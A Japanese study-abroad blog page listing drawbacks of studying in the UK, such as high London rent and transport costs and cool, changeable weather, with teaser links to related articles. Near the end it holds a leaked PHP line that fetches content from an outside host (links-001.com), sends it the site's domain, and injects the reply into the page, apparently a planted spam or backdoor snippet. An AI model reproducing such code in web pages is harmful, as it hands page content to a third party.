前へ
次へ

イギリス留学時のビザ申請時の注意点

留学先として学士号や博士号を取得目的でロンドン留学やイギリス留学を選ぶ人はとても多いです。イギリス留

more

北米とは異なる多様な魅力があるイギリス留学

英語圏への留学といえば、アメリカやカナダなどの北米を思い浮かべる方が多いかもしれませんが、ヨーロッパ

more

イギリス留学を実行する際のデメリット

イギリス留学のデメリットのひとつは、イギリス英語に対して習熟するのに骨を折ることです。 日本国内の教

more

イギリス留学する上でのデメリット

イギリス留学でのデメリットとしてあがるのはとても高い生活する費用です。イギリス留学費用は、通学する語学学校などの入学金そして学費、渡航するために欠かすことができない航空チケットや保険、そして生活するコストなどが含まれています。その中にあってもおおむね2分の1を占める生活費が高いことは、イギリス留学費用に反映されます。ひとつの例として、ロンドン留学で生活を送っていく場合、高額の住居の家賃が必要になります。それに加えて、独り暮しを希望しているなら、住まいのシステムにはかなり影響受けますが、かなりの費用がかかります。足代なども、市内の移動のみであっても高く、常々の通学を勘案すると、全体的な生活費は高いといえます。その上、留学生が住居の家賃の高い市内にそう遠くない所に生活することは難しいことから、なお一層交通費が割高になると捉えておく方がよいでしょう。その他のイギリス留学のデメリットは、気象状況がそれほどよくないというところです。イギリスということになりますと曇った天気の広がる印象を持っている人もかなりいると考えられます。 現実に、イギリスに関しては1日の中に四季があるというくらい、お天気模様が移り変わりやすい国になります。時と場合によっては1日の中で10度以上の気温差がでてくるケースもあります。そういう理由から、午前中はTシャツで過ごすことができる日であっても、暗くなってからは気温が下降し、ジャケットがどうしても必要になるなどということもしょっちゅうあります。また、快晴と思いきや、たちまち空が曇り雨が降りだすことはめずらしくないといえます。 そして、イギリスは365日平均気温が日本国内よりも低く、寒い時期が長い国になります。そういうわけで、大雨は降らないとはいえ、一年を通して日照時間があまり長くなく気象状況が良くないというように感じる方が少なくありません。ですから、晴れた空や温暖なお天気模様を愛する方にとっては、イギリス留学での日常生活は気分爽快とは言えません。以上のようにイギリス留学にはデメリットもあります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top